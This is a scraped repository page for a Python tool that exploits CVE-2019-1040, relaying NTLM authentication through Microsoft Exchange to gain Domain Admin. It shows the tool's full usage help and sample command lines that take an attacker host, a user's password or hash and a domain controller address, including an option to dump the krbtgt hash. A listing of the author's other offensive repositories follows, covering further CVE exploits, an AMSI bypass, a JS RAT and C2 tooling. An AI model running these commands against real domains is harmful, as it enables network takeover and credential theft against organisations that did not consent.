• Stars
    star
    237
  • Rank 169,885 (Top 4 %)
  • Language
    Python
  • License
    MIT License
  • Created over 5 years ago
  • Updated over 1 year ago

Reviews

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

Repository Details

CVE-2019-1040 with Exchange

CVE-2019-1040

Great writeup! Exploiting CVE-2019-1040 - Combining relay vulnerabilities for RCE and Domain Admin .

So, I wrote CVE-2019-1040.py for easy to use.

You can also check out my exchange2domain repo: https://github.com/ridter/exchange2domain, another way to use exchange to get DC.

Requirements

These tools require impacket. You can install it from pip with pip install impacket.

Usage

usage: CVE-2019-1040.py [-h] [-u USERNAME] [-d DOMAIN] [-p PASSWORD]
                        [--hashes HASHES] [--smb-port [destination port]] -ah
                        ATTACKER_HOST [-ap ATTACKER_PORT] -th TARGET_HOST
                        [-t TIMEOUT]
                        [--exec-method [{smbexec,wmiexec,mmcexec}]]
                        [--just-dc-user USERNAME] [--debug]
                        EX_HOSTNAME

CVE-2019-1040 with Exchange

positional arguments:
  EX_HOSTNAME           Hostname/ip of the Exchange server

optional arguments:
  -h, --help            show this help message and exit
  -u USERNAME, --user USERNAME
                        username for authentication
  -d DOMAIN, --domain DOMAIN
                        domain the user is in (FQDN or NETBIOS domain name)
  -p PASSWORD, --password PASSWORD
                        Password for authentication, will prompt if not
                        specified and no NT:NTLM hashes are supplied
  --hashes HASHES       LM:NLTM hashes
  --smb-port [destination port]
                        Destination port to connect to SMB Server
  -ah ATTACKER_HOST, --attacker-host ATTACKER_HOST
                        Attacker hostname or IP
  -th TARGET_HOST, --target-host TARGET_HOST
                        Hostname or IP of the DC
  -t TIMEOUT, --timeout TIMEOUT
                        timeout in seconds
  --exec-method [{smbexec,wmiexec,mmcexec}]
                        Remote exec method to use at target (only when using
                        -use-vss). Default: smbexec
  --just-dc-user USERNAME
                        Extract only NTDS.DIT data for the user specified.
                        Only available for DRSUAPI approach.
  --debug               Enable debug output

example:

python CVE-2019-1040.py -ah attackterip -u user -p password -d domain.com -th DCip MailServerip 
python CVE-2019-1040.py -ah attackterip -u user --hashes userhash -d domain.com -th DCip MailServerip 

If you only want to dump krbtgt, use --just-dc-user.

example:

python CVE-2019-1040.py -ah attackterip -u user -p password -d domain.com -th DCip MailServerip  --just-dc-user krbtgt
python CVE-2019-1040.py -ah attackterip -u user --hashes userhash -d domain.com -th DCip MailServerip --just-dc-user krbtgt

More Repositories

1

Intranet_Penetration_Tips

2018年初整理的一些内网渗透TIPS,后面更新的慢,所以整理出来希望跟小伙伴们一起更新维护~
4,089
star
2

noPac

Exploiting CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user
Python
567
star
3

CVE-2017-11882

CVE-2017-11882 from https://github.com/embedi/CVE-2017-11882
Python
531
star
4

Pentest

tools
C
524
star
5

Exchange2domain

CVE-2018-8581
Python
358
star
6

cve-2020-0688

cve-2020-0688
Python
315
star
7

acefile

POC of https://research.checkpoint.com/extracting-code-execution-from-winrar/
Python
270
star
8

Mailget

通过脉脉用户猜测企业邮箱
Python
227
star
9

get_ip_by_ico

从shodan获取使用了相同favicon.ico的网站
Python
190
star
10

CVE-2018-15982_EXP

exp of CVE-2018-15982
Python
181
star
11

PySQLTools

Mssql利用工具
Python
165
star
12

RTF_11882_0802

PoC for CVE-2018-0802 And CVE-2017-11882
Python
164
star
13

owa_info

获取Exchange信息的小工具
Python
160
star
14

RelayX

NTLM relay test.
Python
156
star
15

CS_Chinese_support

Cobalt strike 修改支持回显中文。
145
star
16

MyJSRat

This is JSRat.ps1 in Python
Python
134
star
17

AMSI_bypass

XSLT
78
star
18

SharpAddDomainMachine

SharpAddDomainMachine
C#
68
star
19

proxyshell_payload

proxyshell payload generate
Python
67
star
20

cs_custom_404

Cobalt strike custom 404 page
HTML
61
star
21

GhostPotato

Just pick out the code we need.
Python
52
star
22

pyForgeCert

pyForgeCert is a Python equivalent of the ForgeCert.
Python
51
star
23

DomainHiding

external c2 use domainhiding.
Go
48
star
24

hackredis

Python
42
star
25

p12tool

A simple Go script to brute force or parse a password-protected PKCS#12 (PFX/P12) file.
Go
39
star
26

MSSQL_CLR

MSSQL CLR for pentest.
C#
35
star
27

CVE-2019-1040-dcpwn

CVE-2019-1040 with Kerberos delegation
Python
32
star
28

WebDAV

Set Up WebDAV Server for Remote File Sharing and more
Shell
31
star
29

warp_proxy

cloudflare socks5 server
Shell
31
star
30

atexec-pro

Fileless atexec, no more need for port 445
Python
29
star
31

tshtun

Py写的tsh的流量加解密过程。
C
25
star
32

xslt_poc

Execute codes From XSLT
XSLT
17
star
33

mousejack_replay

mousejack hack
Python
11
star
34

Python_Codes

some python codes
Python
9
star
35

Cortana

Some Cortana scripts
Ruby
3
star
36

comment

orz..
2
star
37

gitTun

GIt tun
Python
1
star
38

Ridter

1
star